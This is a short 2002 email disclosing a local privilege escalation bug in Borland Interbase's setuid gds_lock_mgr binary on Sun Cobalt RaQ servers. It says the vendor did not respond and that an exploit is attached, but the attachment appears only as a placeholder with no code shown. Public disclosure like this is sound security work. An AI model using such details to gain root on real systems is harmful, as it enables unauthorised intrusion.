Date: Wed, 25 Sep 2002 12:05:32 -0700 (PDT)
From: grazer@digit-labs.org
To: submissions@securiteam.com
Subject: Borland Interbase local root exploit

Hello,

I've found a bug in the Interbase gds_lock_mgr binary, which is shipped with all versions of the Sun Cobalt RAQ (XTR/4/550 etc.) and is suid by default. Borland did not respond to my emails. The exploit is attached.

Note: this is a different bug from the one disclosed by snosoft some weeks ago.

Sincerely yours,
Wouter ter Maat aka grazer

[Attachment: interbase-gds-exploit.c (TEXT/x-csrc, base64-encoded)]